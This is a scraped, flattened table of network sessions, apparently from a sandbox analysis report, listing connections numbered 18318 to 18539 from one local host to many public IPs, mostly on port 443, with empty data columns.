                                      18318192.168.2.143345695.4.92.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18319192.168.2.1446796181.105.72.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18320192.168.2.1448350188.232.144.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18321192.168.2.1441794200.226.110.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18322192.168.2.1445948105.48.195.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18323192.168.2.145664686.151.117.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18324192.168.2.1436246195.157.173.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18325192.168.2.145499649.99.13.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18326192.168.2.1460090205.102.180.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18327192.168.2.145432679.80.218.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18328192.168.2.1433894179.153.98.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18329192.168.2.1441442193.29.119.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18330192.168.2.144931699.179.106.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18331192.168.2.1443884111.133.45.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18332192.168.2.144267688.194.37.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18333192.168.2.144529864.57.60.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18334192.168.2.145667863.183.109.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18335192.168.2.1443878156.254.16.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18336192.168.2.143438872.46.71.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18337192.168.2.1434430137.99.147.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18338192.168.2.1432852143.181.235.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18339192.168.2.145497252.92.113.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18340192.168.2.1447628192.121.185.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18341192.168.2.1440654163.78.8.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18342192.168.2.145910269.127.165.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18343192.168.2.1438510198.175.225.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18344192.168.2.1436398107.104.85.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18345192.168.2.143618081.52.185.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18346192.168.2.1442820122.212.37.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18347192.168.2.1437484145.113.58.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18348192.168.2.1434196142.87.233.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18349192.168.2.1450716153.127.153.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18350192.168.2.1448560174.13.218.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18351192.168.2.145061874.176.177.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18352192.168.2.1456882116.6.10.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18353192.168.2.1440778121.115.84.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18354192.168.2.1449626118.127.33.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18355192.168.2.1460530164.89.165.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18356192.168.2.143783017.105.129.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18357192.168.2.1433118180.163.192.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18358192.168.2.1435344128.156.214.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18359192.168.2.146084665.39.244.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18360192.168.2.1443432102.191.88.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18361192.168.2.14449045.15.197.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18362192.168.2.144138612.14.43.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18363192.168.2.1459564161.118.212.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18364192.168.2.144194269.87.168.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18365192.168.2.1437298217.15.86.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18366192.168.2.143335845.184.162.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18367192.168.2.1444772168.127.207.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18368192.168.2.144944024.147.15.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18369192.168.2.1455050119.22.255.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18370192.168.2.143730820.51.31.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18371192.168.2.143754688.57.34.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18372192.168.2.144176251.168.24.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18373192.168.2.1449220172.164.150.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18374192.168.2.144631279.100.219.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18375192.168.2.144872475.57.1.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18376192.168.2.144771495.67.135.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18377192.168.2.1459568137.74.143.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18378192.168.2.1443482143.93.130.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18379192.168.2.1453556104.147.155.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18380192.168.2.1454170123.111.13.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18381192.168.2.1436990141.90.143.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18382192.168.2.145134214.165.172.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18383192.168.2.145124641.221.160.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18384192.168.2.1449702138.174.126.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18385192.168.2.1453646196.126.66.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18386192.168.2.145701459.190.7.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18387192.168.2.145895438.170.114.408080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18388192.168.2.1444000212.76.103.178080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18389192.168.2.144170875.154.34.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18390192.168.2.1434832144.176.138.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18391192.168.2.1454238120.88.44.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18392192.168.2.143944436.243.71.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18393192.168.2.1457890110.100.195.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18394192.168.2.1454668206.112.89.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18395192.168.2.1454276202.89.16.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18396192.168.2.1446170109.6.237.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18397192.168.2.144492036.138.17.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18398192.168.2.1460560156.108.25.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18399192.168.2.145215649.251.190.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18400192.168.2.1458624101.31.9.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18401192.168.2.145140049.103.145.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18402192.168.2.1453898130.179.165.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18403192.168.2.1442862133.15.187.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18404192.168.2.143740832.106.234.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18405192.168.2.1456070203.35.245.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18406192.168.2.143409876.147.232.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18407192.168.2.1441972145.205.227.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18408192.168.2.144025614.171.97.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18409192.168.2.1434116103.100.242.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18410192.168.2.144810682.84.213.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18411192.168.2.145092458.86.36.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18412192.168.2.1443782204.54.190.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18413192.168.2.146013019.175.101.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18414192.168.2.1452934110.240.21.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18415192.168.2.1450738169.117.19.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18416192.168.2.143885652.49.190.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18417192.168.2.145457440.50.160.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18418192.168.2.144654287.191.105.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18419192.168.2.144109693.143.58.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18420192.168.2.1454144174.153.150.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18421192.168.2.1449268173.38.27.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18422192.168.2.1459524121.199.242.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18423192.168.2.144664887.182.146.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18424192.168.2.1456532151.166.241.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18425192.168.2.145376499.18.253.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18426192.168.2.1441492194.136.71.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18427192.168.2.1434462189.52.153.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18428192.168.2.143619254.5.111.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18429192.168.2.1448478195.154.104.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18430192.168.2.1459152114.176.105.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18431192.168.2.1457098119.141.24.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18432192.168.2.14579385.203.255.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18433192.168.2.1438812152.75.236.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18434192.168.2.1436740131.182.64.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18435192.168.2.144921896.221.112.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18436192.168.2.1442648178.120.23.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18437192.168.2.1454974141.71.42.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18438192.168.2.1444742177.125.48.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18439192.168.2.1450660154.211.72.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18440192.168.2.144447625.73.107.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18441192.168.2.1446192104.8.82.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18442192.168.2.14344269.58.22.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18443192.168.2.1444318179.68.250.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18444192.168.2.1435982213.130.139.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18445192.168.2.143695866.127.158.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18446192.168.2.145473091.24.11.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18447192.168.2.143795672.194.169.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18448192.168.2.145528868.57.151.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18449192.168.2.1455630144.172.123.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18450192.168.2.1452442135.201.105.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18451192.168.2.144759087.52.180.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18452192.168.2.1433222191.33.174.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18453192.168.2.144180438.152.41.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18454192.168.2.145005099.53.44.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18455192.168.2.1444652202.185.246.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18456192.168.2.143761059.236.99.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18457192.168.2.144855825.227.145.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18458192.168.2.1450220211.19.208.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18459192.168.2.144909245.211.30.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18460192.168.2.14563405.173.205.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18461192.168.2.1446132109.209.29.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18462192.168.2.1436406157.181.2.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18463192.168.2.1450420122.14.69.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18464192.168.2.1437168203.133.5.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18465192.168.2.145330046.247.251.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18466192.168.2.1435734209.126.29.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18467192.168.2.144828414.47.128.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18468192.168.2.1443716185.224.177.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18469192.168.2.1444416177.129.162.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18470192.168.2.145793635.158.2.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18471192.168.2.1457280149.167.72.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18472192.168.2.1435352197.106.61.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18473192.168.2.1445006179.48.151.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18474192.168.2.1440878178.244.219.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18475192.168.2.1446084185.157.65.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18476192.168.2.1450974144.10.110.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18477192.168.2.144861639.176.232.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18478192.168.2.145611075.135.117.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18479192.168.2.1433878218.81.185.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18480192.168.2.1454010137.7.29.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18481192.168.2.1459600126.150.110.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18482192.168.2.1458936213.186.35.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18483192.168.2.1433458189.85.144.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18484192.168.2.14604528.18.143.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18485192.168.2.144561443.137.35.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18486192.168.2.1433978213.52.227.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18487192.168.2.1434686139.19.184.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18488192.168.2.144176693.179.152.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18489192.168.2.1438948161.169.219.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18490192.168.2.145644675.215.141.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18491192.168.2.1432888134.81.50.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18492192.168.2.1453060175.242.29.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18493192.168.2.145348674.181.53.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18494192.168.2.1450372195.6.210.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18495192.168.2.144390835.228.109.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18496192.168.2.1454232198.81.208.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18497192.168.2.1445696169.141.152.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18498192.168.2.145581680.72.79.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18499192.168.2.145280265.91.184.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18500192.168.2.146094238.155.181.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18501192.168.2.145175414.169.206.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18502192.168.2.145997686.186.235.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18503192.168.2.145211039.55.64.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18504192.168.2.1444602110.89.187.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18505192.168.2.1454644111.99.100.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18506192.168.2.145154897.207.1.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18507192.168.2.1432868146.233.17.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18508192.168.2.143497234.80.242.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18509192.168.2.1449258110.100.123.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18510192.168.2.144010075.255.153.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18511192.168.2.1433788113.6.100.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18512192.168.2.144397037.159.136.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18513192.168.2.1453144135.102.97.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18514192.168.2.1451492223.179.25.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18515192.168.2.14540148.123.105.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18516192.168.2.145536261.190.147.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18517192.168.2.1448000176.106.168.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18518192.168.2.1453378145.169.161.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18519192.168.2.1439844138.72.234.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18520192.168.2.145880214.253.147.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18521192.168.2.144683088.60.83.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18522192.168.2.1448486135.230.71.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18523192.168.2.1435434161.216.199.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18524192.168.2.1440450188.244.183.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18525192.168.2.1445440171.174.10.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18526192.168.2.145682495.9.44.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18527192.168.2.1444038183.166.118.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18528192.168.2.1433380100.213.144.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18529192.168.2.1434756132.95.201.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18530192.168.2.1438464109.194.121.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18531192.168.2.1455712122.65.181.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18532192.168.2.1439608219.114.154.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18533192.168.2.144908023.197.46.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18534192.168.2.144689251.106.127.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18535192.168.2.1457760118.40.13.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18536192.168.2.1445924142.60.255.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18537192.168.2.1454062203.223.243.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18538192.168.2.1448028128.195.168.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18539192.168.2.145222614.80.133.23443
                                      TimestampBytes transferredDirectionData


